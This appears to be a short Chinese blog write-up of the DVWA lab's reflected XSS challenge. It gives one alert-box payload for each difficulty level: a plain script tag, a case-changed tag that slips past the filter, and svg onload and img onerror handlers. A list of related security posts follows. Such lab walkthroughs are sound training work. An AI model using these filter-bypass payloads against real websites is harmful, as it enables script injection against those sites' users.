一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
汤愈韬4 小时前
防火墙地址转换技术NAT世界尽头与你5 小时前
CVE-2014-3566: OpenSSL 加密问题漏洞内心如初8 小时前
2025.11.29-威胁情报 | QQ Windows客户端跨站脚本漏洞(QVD-2025-45847)white-persist10 小时前
【攻防世界】reverse | IgniteMe 详细题解 WPWhoami!15 小时前
❼⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 在线资源漏洞文库-Web安全18 小时前
【CTF】关于md5总结聊天QQ:2769988518 小时前
基于51单片机的汽车灯光模拟仿真之旅漏洞文库-Web安全19 小时前
【CTF】buuctf web 详解(持续更新)AI绘画小332 天前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!414a2 天前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程